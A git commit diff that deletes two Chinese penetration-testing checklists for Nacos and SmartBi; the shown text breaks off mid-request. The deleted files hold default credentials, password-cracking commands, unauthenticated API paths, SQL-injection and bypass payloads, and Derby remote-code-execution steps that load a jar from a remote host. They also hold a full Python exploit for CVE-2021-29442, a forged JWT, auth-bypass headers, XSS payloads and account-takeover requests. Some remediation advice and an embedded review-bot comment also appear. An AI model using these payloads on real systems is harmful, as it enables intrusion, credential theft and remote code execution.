This commit is contained in:
Threekiii 2025-03-10 16:59:48 +08:00
parent f73d5f6046
commit 8eeaa32420
18 changed files with 55 additions and 1861 deletions


@ -1,495 +0,0 @@
# Nacos 漏洞 Checklist
## 一、前置知识
### 0x01 Nacos 概述
Nacos 是阿里巴巴推出来的一个新开源项目是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。
## 二、默认口令/弱口令
Nacos 默认帐户名密码:
```
nacos/nacos
```
数据库中的 bcrypt 加密存储示例:
```shell
# nacos
$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu
# Hello123
$2a$10$rT.ZmZTjj55Xs65yR9ZDdexuLITXfCXkifQv4KpLm7yVLtiBmUHgG
```
弱口令爆破 with hashcat
```shell
# nacos
echo -n '$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu' > hashes.txt
-----
hashcat -m 3200 -a 0 -o result.txt hashes.txt ~/HackTools/Dict/YOUR_DICT.txt --force
-----
cat result.txt
$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu:nacos
# Hello123
echo -n '$2a$10$rT.ZmZTjj55Xs65yR9ZDdexuLITXfCXkifQv4KpLm7yVLtiBmUHgG' > hashes.txt
hashcat -m 3200 -a 0 -o result.txt hashes.txt ~/HackTools/Dict/YOUR_DICT.txt --force
-----
cat result.txt
$2a$10$rT.ZmZTjj55Xs65yR9ZDdexuLITXfCXkifQv4KpLm7yVLtiBmUHgG:Hello123
```
弱口令爆破 with john the ripper
```shell
john --wordlist=~/HackTools/Dict/YOUR_DICT.txt hashes.txt
-----
john --show hashes.txt
?:Hello123
```
## 三、可能存在的未授权 API
### 0x01 用户信息 API
```
/nacos/v1/auth/users?pageNo=1&pageSize=9
```
### 0x02 集群信息 API
```
/nacos/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=
```
### 0x03 配置信息 API
```
/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=9&tenant=&search=accurate&accessToken=&username=
# or
/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=9&tenant=<IF_YOU_KNOW_SOME_TENANT>&search=accurate&accessToken=&username=
```
这一接口在未授权的情况下可能会暴露 Spring、MySQL、Redis、Druid 等配置信息,若存在云环境、文件系统,还可能暴露 accessKey、secretKey 等。
获取配置信息示例:
![image-20230609161347780](images/image-20230609161347780.png)
获取 ak、sk 示例:
![image-20230609161814152](images/image-20230609161814152.png)
如果返回为 403 Forbidden可以尝试 CNVD-2023674205 漏洞绕过限制。
## 四、 SQL 注入风险 CVE-2021-29442
### 漏洞描述
在使用 Derby 数据库作为内置数据源时Nacos config server 中有未鉴权接口 `/nacos/v1/cs/ops/derby`,执行 SQL 语句可以查看敏感数据,可以执行任意的 SELECT 查询语句。如果使用外置数据库(如 MySQL则该接口无法访问。
漏洞点位于 nacos-config 的 com.alibaba.nacos.config.server.controller.ConfigOpsController。
### 漏洞影响
```
Nacos 未鉴权且使用 Derby 数据库作为内置数据源
```
### 漏洞复现
poc
```
/nacos/v1/cs/ops/derby?sql=select+*+from+sys.systables
# or
/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st
```
一些查询语句:
```
select * from users
select * from permissions
select * from roles
select * from tenant_info
select * from tenant_capacity
select * from group_capacity
select * from config_tags_relation
select * from app_configdata_relation_pubs
select * from app_configdata_relation_subs
select * from app_list
select * from config_info_aggr
select * from config_info_tag
select * from config_info_beta
select * from his_config_info
select * from config_info
```
Bypass payload
```
/nacos/v1/cs/ops/derby?sql=SELECT--/dssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssad&sql=/%0a*--/%25&q=dssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssad%&sql=%0afrom--/&sql=/%0ausers
```
使用 Derby 数据库作为内置数据源,且目标系统未开启鉴权功能时,可调用该接口实现 RCE。[RCE payload](http://www.lvyyevd.cn/archives/derby-shu-ju-ku-ru-he-shi-xian-rce):
1. 创建一个 java 编译并打包成 jar放置在对应站点下
```
import java.io.IOException;
public class testShell4 {
public static void exec() throws IOException {
Runtime.getRuntime().exec("cmd.exe /c calc");
}
}
```
2. sql 语句部分如下:
```
# 导入一个类到数据库中
CALL SQLJ.INSTALL_JAR('http://127.0.0.1:8088/test.jar', 'APP.Sample4', 0)
# 将这个类加入到derby.database.classpath这个属性是动态的不需要重启数据库
CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','APP.Sample4')
# 创建一个PROCEDUREEXTERNAL NAME 后面的值可以调用类的static类型方法
CREATE PROCEDURE SALES.TOTAL_REVENUES() PARAMETER STYLE JAVA READS SQL DATA LANGUAGE JAVA EXTERNAL NAME 'testShell4.exec'
# 调用PROCEDURE
CALL SALES.TOTAL_REVENUES()
```
另一个 [Exploit](https://github.com/vulhub/vulhub/tree/master/nacos/CVE-2021-29442):
```
package test.poc;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.io.StringWriter;
public class Example {
public static void main(String[] args) {
String ret = exec("ipconfig");
System.out.println(ret);
}
public static String exec(String cmd) {
StringBuffer bf = new StringBuffer();
try {
String charset = "utf-8";
String osName = System.getProperty("os.name");
if (osName != null && osName.startsWith("Windows"))
charset = "gbk";
Process p = Runtime.getRuntime().exec(cmd);
InputStream fis = p.getInputStream();
InputStreamReader isr = new InputStreamReader(fis, charset);
BufferedReader br = new BufferedReader(isr);
String line = null;
while ((line = br.readLine()) != null)
bf.append(line);
} catch (Exception e) {
StringWriter writer = new StringWriter();
PrintWriter printer = new PrintWriter(writer);
e.printStackTrace(printer);
try {
writer.close();
printer.close();
} catch (IOException iOException) {}
return "ERROR:" + writer.toString();
}
return bf.toString();
}
}
```
```
import random
import sys
import requests
from urllib.parse import urljoin
import argparse
def exploit(target, command, service):
removal_url = urljoin(target, '/nacos/v1/cs/ops/data/removal')
derby_url = urljoin(target, '/nacos/v1/cs/ops/derby')
for i in range(0, sys.maxsize):
id = ''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', 8))
post_sql = f"""CALL sqlj.install_jar('{service}', 'NACOS.{id}', 0)
CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath', 'NACOS.{id}')
CREATE FUNCTION S_EXAMPLE_{id}( PARAM VARCHAR(2000)) RETURNS VARCHAR(2000) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NAME 'test.poc.Example.exec'
"""
get_sql = f"select * from (select count(*) as b, S_EXAMPLE_{id}('{command}') as a from config_info) tmp"
files = {'file': post_sql}
post_resp = requests.post(url=removal_url, files=files)
post_json = post_resp.json()
if post_json.get('message', None) is None and post_json.get('data', None) is not None:
print(post_resp.text)
get_resp = requests.get(url=derby_url, params={'sql': get_sql})
print(get_resp.text)
break
def main():
parser = argparse.ArgumentParser(description='Exploit script for Nacos CVE-2021-29442')
parser.add_argument('-t', '--target', required=True, help='Target URL')
parser.add_argument('-c', '--command', required=True, help='Command to execute')
parser.add_argument('-s', '--service', required=True, help='Service URL')
args = parser.parse_args()
exploit(args.target, args.command, args.service)
if __name__ == '__main__':
main()
```
```
python poc.py -t http://your-ip:8848 -s http://evil/Nacos.jar -c "ps aux"
```
### 修复建议
- [关于Nacos Derby数据库运维接口/nacos/v1/cs/ops/derby相关问题公告](https://nacos-group.github.io/blog/announcement-derby-ops-api/?source=news/)
## 五、认证绕过/用户创建 CVE-2021-29441
### 漏洞描述
2020 年 12 月 29 日披露。在 Nacos 进行认证授权操作时,会判断请求的 User-Agent 是否为 ”Nacos-Server”如果是的话则不进行任何认证。该配置为硬编码通过该漏洞攻击者可以获取到用户名密码等敏感信息且可以进行任意操作包括创建新用户并进行登录后操作。
### 漏洞影响
```
Nacos <= 2.0.0-ALPHA.1
```
### 漏洞复现
访问 `/nacos/v1/auth/users?pageNo=1&pageSize=9` ,查看状态码是否为 200且内容中是否包含 `pageItems`。通过该路由可查询 IP 地址、Nacos 端口、Nacos 版本、raftPort 等信息:
```
http://your-ip:port/nacos/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=
```
通过 `/nacos/v1/auth/users` 路由查询已有的用户列表及敏感信息:
```
http://your-ip:port/nacos/v1/auth/users?pageNo=1&pageSize=9
```
![image-20230609142007526](images/image-20230609142007526.png)
此处需要注意,大部分企业的 Nacos 的 URL 为 `/v1/auth/users` ,而不是默认的 `/nacos/v1/auth/users`,即:
```
/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=
```
```
/v1/auth/users?pageNo=1&pageSize=9
```
尝试以 POST 方式创建新用户whoami/whoami
```
POST /v1/auth/users HTTP/1.1
username=whoami&password=whoami
```
![image-20230609143031183](images/image-20230609143031183.png)
查看刚才创建的新用户使用添加的新用户whoami/whoami进行登录
```
GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
```
![image-20230609143105272](images/image-20230609143105272.png)
HTTP Request Headers
```
User-Agent: Nacos-Server
```
### 修复建议
1. 修改 Nacos 的 application.properties 配置文件,开启服务身份识别功能,配置后访问 `/nacos/v1/auth/users/?pageNo=1&pageSize=9` 路由将返回 403 Forbidden。
```
# 开启鉴权
nacos.core.auth.enabled=true
nacos.core.auth.enable.userAgentAuthWhite=false
nacos.core.auth.server.identity.key=YOUR-KEY
nacos.core.auth.server.identity.value=YOUR-VALUE
```
2. Nacos 注册及配置中心开启权限认证,编辑项目中的 bootstrap.yml 或 bootstrap.properties修改 discovery 和 config 开启用户密码认证(用户名和密码不能带有 %、$ 等会被转义的特殊字符)。
## 六、secret.key 默认密钥 CNVD-2023674205
### 漏洞描述
2023 年 3 月 2 日披露。Alibaba Nacos 使用了固定的 secret.key 默认密钥,导致攻击者可以构造请求获取敏感信息,导致未授权访问漏洞。
### 漏洞影响
```
Alibaba Nacos <= 2.2.0
```
### 漏洞复现
在配置文件 conf/application.properties 中,默认硬编码 nacos.core.auth.plugin.nacos.token.secret.key 的值。
```
nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789
```
Nacos 使用 jwt token算法为 HS256将 secret.key 的默认值当作 secretKey生成 Signature。jwt token 的 Payload 为 subject用户名和 exp有效期
我们伪造一个 jwt tokenPayload
```
{
"sub": "nacos",
"exp": 1696669333
}
```
![image-20230609155053114](images/image-20230609155053114.png)
伪造的 jwt token
```
eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5OTg4ODc3N30.bYEColBVGkF-H-kGr9PxWnbmZZp66z77NXUNHXZbbnw
```
进行验证,没有配置 jwt token 时,返回 403 Forbidden
```
GET /v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=9&tenant=&search=accurate&accessToken=&username= HTTP/1.1
Host: your-ip
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5OTg4ODc3N30.bYEColBVGkF-H-kGr9PxWnbmZZp66z77NXUNHXZbbnw
```
![image-20230609155124566](images/image-20230609155124566.png)
修改 Authorization 头,配置 jwt token返回 200 OK
```
Authorization: Bearer <jwt token>
```
![image-20230609155215648](images/image-20230609155215648.png)
### 漏洞修复
1. 修改生成 Token 的 secret.key推荐自定义密钥时将配置项设置为 Base64 编码的字符串,且原始密钥长度不得低于 32 字符。
```
#启用认证
nacos.core.auth.enabled=true
#生成 Token 的密钥
nacos.core.auth.plugin.nacos.token.secret.key=base64编码
```
2. 升级到 2.2.0.1 及之后版本。Nacos 官方在 2023.03.02 发布了 2.2.0.1下载地址https://github.com/alibaba/nacos/releases/tag/2.2.0.1最新版本https://github.com/alibaba/nacos/releases。
## 七、identity.key/value 默认值认证绕过
### 漏洞描述
当开启 Nacos 权限认证nacos.core.auth.enabled=true配置文件中存在默认值
```
nacos.core.auth.server.identity.key=serverIdentity
nacos.core.auth.server.identity.value=security
```
该硬编码导致攻击者可以构造携带该 key 和 value 的请求,从而绕过权限认证。
### 漏洞影响
```
Nacos <= 2.2.0
```
### 漏洞复现
```
POST /v1/auth/users HTTP/1.1
serverIdentity: security
username=whoami&password=whoami
```
当开启 Nacos 权限认证nacos.core.auth.enabled=true必须填写 nacos.core.auth.server.identity.key 和 nacos.core.auth.server.identity.value 才能够正常启动。若 `serverIdentity: security` 无法绕过,可以尝试以下键值对:
```
官网示例中的键值对 example:example
```
```
搜索引擎解决方案中出现最多的键值对 test:test
```
### 漏洞修复
1. 配置自定义身份识别的 key不可为空和 value不可为空
```
nacos.core.auth.server.identity.key=example
nacos.core.auth.server.identity.value=example
```
2. 升级最新版本https://github.com/alibaba/nacos/releases。
## 八、Nacos 集群 Raft 反序列化漏洞
### 漏洞描述
Nacos 在处理某些基于 Jraft 的请求时,采用 Hessian 进行反序列化但并未设置限制导致应用存在远程代码执行RCE漏洞。
### 漏洞影响
```
1.4.0 <= Nacos < 1.4.6 使用cluster集群模式运行
2.0.0 <= Nacos < 2.2.3 任意模式启动
```
Nacos 1.x 在单机模式下默认不开放 7848 端口故该情况通常不受此漏洞影响。Nacos 2.x 版本无论单机或集群模式均默认开放 7848 端口。
### 漏洞复现
exp
- https://github.com/c0olw/NacosRce/
### 漏洞修复
#### 通用修补建议
目前官方已发布安全修复更新,受影响用户可以升级到 Nacos 1.4.6、Nacos 2.2.3
- https://github.com/alibaba/nacos/releases/tag/1.4.6
- https://github.com/alibaba/nacos/releases/tag/2.2.3
#### 临时修补建议
对外限制开放 7848 端口,一般使用时该端口为 Nacos 集群间 Raft 协议的通信端口,不承载客户端请求,因此老版本可以通过禁止该端口来自 Nacos 集群外的请求达到止血目的(如部署时已进行限制或未暴露,则风险可控)。
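Review bot: this hunk deletes the remediation guidance together with the exploit material, and nothing on the commit page says where that guidance goes. The 修复建议 / 漏洞修复 blocks are the defensively useful part of the file: the application.properties hardening (`nacos.core.auth.enabled=true`, `nacos.core.auth.enable.userAgentAuthWhite=false`), the advice to replace the default secret.key with a Base64 value of at least 32 raw characters and to set a non-default identity.key/value pair, the 7848-port restriction for the Raft deserialization issue, and the 1.4.6 / 2.2.3 upgrade pointers. If the intent is to drop the PoC payloads and helper scripts, consider keeping those sections (or a pointer to where they now live) instead of removing the whole file. The commit page also shows no message explaining the removal of 18 files with 1861 deletions, so the reason for the change should at least be stated in the commit description.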


@ -1,493 +0,0 @@
# SmartBi 漏洞 Checklist
## 一、前置知识
### 0x01 SmartBi 概述
Smartbi 是企业级商业智能和大数据分析平台满足用户在企业级报表、数据可视化分析、自助分析平台、数据挖掘建模、AI 智能分析等大数据分析需求。该软件应用范围较广,据官网介绍,在全球财富 500 强的 10 家国内银行,有 8 家选用了 Smartbi。
### 0x02 FOFA指纹
```
app="SMARTBI"
```
### 0x03 登录入口
```
https://127.0.0.1/vision/mobileportal.jsp
https://127.0.0.1/vision/mobileX/login
https://127.0.0.1/vision/index.jsp
https://127.0.0.1/smartbi/vision/index.jsp
```
密码正确的情况下部分平台无法登陆此时设置user-agent为手机端就可以。
### 0x04 常见口令
```
demo/demo
manager/demo
admin/admin
admin/manager
admin/2manager
```
## 二、认证漏洞
### 0x01 登录爆破
```
POST /vision/RMIServlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; PRA-LX3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1/vision/mobileX/login
content-type: application/x-www-form-urlencoded
Content-Length: 70
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: JSESSIONID=1DA1DAA51469E646F97AD829F29A2B15
className=UserService&methodName=login&params=["admin","admin"]
```
抓取 true/false 字段。
### 0x02 401认证弱口令
/vision 目录下的文件都需要 401 认证:
```
admin/admin
admin/manager
admin/2manager
mining/admin
demo/demo
manager/demo
manager/admin
user/admin
test/admin
huanan/admin
```
不论用户名输什么,只要密码正确即可。
## 三、信息泄露
### 0x01 敏感信息
#### 查看版本
```
https://127.0.0.1/vision/version.txt
```
```
https://127.0.0.1/vision/packageinfo.txt
```
#### 目录遍历
```
https://127.0.0.1/vision/chooser.jsp?key=CONFIG_FILE_DIR&root=%2F
```
#### 信息泄露
```
https://127.0.0.1/vision/monitor/sysprops.jsp
```
```
https://127.0.0.1/vision/monitor/getclassurl.jsp?classname=smartbi.freequery.expression.ast.TextNode
```
```
https://127.0.0.1/vision/monitor/hardwareinfo.jsp
```
#### 接口泄露
直接访问 wsdl 无需 401
```
https://127.0.0.1/vision/listwsdl.jsp
```
提供资源目录树的访问功能:
```
https://127.0.0.1/vision/services/CatalogService?wsdl
```
SimpleReportService 提供灵活报表相关操作功能:
```
https://127.0.0.1/vision/services/SimpleReportService?wsdl
```
BusinessViewService 提供数据集定义相关操作功能:
```
https://127.0.0.1/vision/services/BusinessViewService?wsdl
```
DataSourceService 提供数据源相关操作功能:
```
https://127.0.0.1/vision/services/DataSourceService?wsdl
```
AnalysisReportService 提供多维分析相关操作功能:
```
https://127.0.0.1/vision/services/AnalysisReportService?wsdl
```
UserManagerService 提供用户相关操作,包括读取/维护用户信息、读取/维护组信息、读取/维护角色信息、为用户和组分配角色等:
```
https://127.0.0.1/vision/services/UserManagerService?wsdl
```
### 0x02 Session劫持
可重置用户密码,且无需原密码。
```
https://127.0.0.1/vision/monitor/listsessions.jsp
```
![image-20230717111349311](images/image-20230717111349311.png)
理论上重置成功,返回为 true但是实际测试过程中修改后的密码既不是改之前的密码也不是修改后的密码过一段时间自动重置为原来的密码。
```
POST /vision/RMIServlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1/vision/index.jsp
If-Modified-Since: 0
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 148
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: JSESSIONID=848B4743452D02C5A53FECCA58C47299
className=UserService&methodName=updateUserForChange&params=["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","zhongguo1","null","QWEqwe123",true]
```
```
POST /vision/RMIServlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1/vision/index.jsp
If-Modified-Since: 0
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 133
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: JSESSIONID=848B4743452D02C5A53FECCA58C47299
className=UserService&methodName=addUserAttribute&params=["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","SYSTEM_user_isEdit","0",null]
```
其中I8a94ca4e0175ab4aab4aaae90175d3e824c66a87为用户的id字段唯一身份标识。
### 0x03 Heapdump泄露
```
https://127.0.0.1/vision/monitor/heapdump.jsp
```
```
https://127.0.0.1/vision/monitor/heapdump.jsp?dumpbin=true
```
### 0x04 反射型/存储型XSS
```
https://127.0.0.1/vision/chooser.jsp?key=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E&root=/u01/data/domains/app_domain
```
```
https://127.0.0.1/vision/monitor/testmailserver.jsp?host=mail.longtop.com&user=111%22%3E%3Cimg%20src=x%20onerror=prompt(0)%3E&pass=123456
```
登录后个人参数位置,加密后传参可导致存储型 xss。
### 0x05 SSRF
探测出口ip
```
https://127.0.0.1/vision/monitor/testmailserver.jsp
```
## 四、SQL注入
需要登录,任意报表功能,例如:
```
https://127.0.0.1/vision/ssreportServlet
```
```
POST /vision/ssreportServlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1/vision/openresource.jsp?iPad=true&refresh=true&showtoolbar=false&showPath=false&resid=I40281d81016a8bc28bc20231016aaee007b230ac&_timestamp=1610433924926
Content-Type: application/x-www-form-urlencoded
Content-Length: 3293
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: FQPassword=; JSESSIONID=4BB550BF10C606619B753D3CE52CD3AB
Upgrade-Insecure-Requests: 1
sheetIndex=0&resid=I40281d81016a8bc28bc20231016aaee007b230ac&clientId=Iff8080810176f0c7f0c7544f0176f54eb72c1160&refreshType=refresh&paramsInfoEncode=encode=/JV/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aJ/'T/mJ/aK/VT/'T/aJ/m7/'T/a9/O9/V7/uu/ut/uu6(dp/uu/NO/uu/aJ/'T/mJ/aK/VT/'T/aJ/m7/'T/a9/O9/V7/uu/ut/uu(SR(D/uu/NO/uu/aJ/'T/mJ/aK/VT/'T/aJ/m7/'T/a9/O9/V7/uu/ut/uug(SQp/uu/NO/uun111/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uun111/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/'m/'7/aJ/V1/ma/aM/mt/VO/aM/ma/'K/uu/ut/uu6(dp/uu/NO/uu/aM/'m/'7/aJ/V1/ma/aM/mt/VO/aM/ma/'K/uu/ut/uu(SR(D/uu/NO/uu/aM/'m/'7/aJ/V1/ma/aM/mt/VO/aM/ma/'K/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/'m/'7/aJ/mt/O'/a9/mt/'1/aK/VV/VT/uu/ut/uu6(dp/uu/NO/uu/aM/'m/'7/aJ/mt/O'/a9/mt/'1/aK/VV/VT/uu/ut/uu(SR(D/uu/NO/uu/aM/'m/'7/aJ/mt/O'/a9/mt/'1/aK/VV/VT/uu/ut/uug(SQp/uu/NO/uuKK7777/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/aJ/Vm/Vx/aK/V'/mt/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/'m/'7/aJ/mt/O'/aJ/mt/V7/aJ/V'/'u/uu/ut/uu6(dp/uu/NO/uu/aM/'m/'7/aJ/mt/O'/aJ/mt/V7/aJ/V'/'u/uu/ut/uu(SR(D/uu/NO/uu/aM/'m/'7/aJ/mt/O'/aJ/mt/V7/aJ/V'/'u/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/aJ/'J/O'/am/'N/O'/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/'m/'7/aJ/mt/O'/aJ/'t/VO/aJ/'a/Vx/uu/ut/uu6(dp/uu/NO/uu/aM/'m/'7/aJ/mt/O'/aJ/'t/VO/aJ/'a/Vx/uu/ut/uu(SR(D/uu/NO/uu/aM/'m/'7/aJ/mt/O'/aJ/'t/VO/aJ/'a/Vx/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/aJ/'J/O'/am/'N/O'/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~MqRh/uu/ut/uu6(dp/uu/NO/uuRh/uu/ut/uu(SR(D/uu/NO/uu/aM/ON/'7/aM/VJ/'V/aM/mt/VO/aM/ma/'KRh/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aJ/O1/OV/aM/'O/OJ/aM/m9
/VM/am/m9/VK/a'/VJ/V9/uu/ut/uu6(dp/uu/NO/uu/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uu(SR(D/uu/NO/uu/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uu6(dp/uu/NO/uu/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uu(SR(D/uu/NO/uu/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uu6(dp/uu/NO/uu/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uu(SR(D/uu/NO/uu/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uu6(dp/uu/NO/uu/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uu(SR(D/uu/NO/uu/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/JT&pageId=0&writeBackData=&exportSheetIndexes=&exportId=&op=%7B%22getTotalPages%22%3Atrue%2C%22sheetPageCounts%22%3A%5B1%5D%7D
```
#### 0x01 解码并修改数据包直接注入
修改 paramsInfoEncode 为 paramsInfo将 Encode 参数去掉以下payload 可直接使用):
```
POST /vision/ssreportServlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1/vision/openresource.jsp?iPad=true&refresh=true&showtoolbar=false&showPath=false&resid=I40281d81016a8bc28bc20231016aaee007b230ac&_timestamp=1610433924926
Content-Type: application/x-www-form-urlencoded
Content-Length: 3282
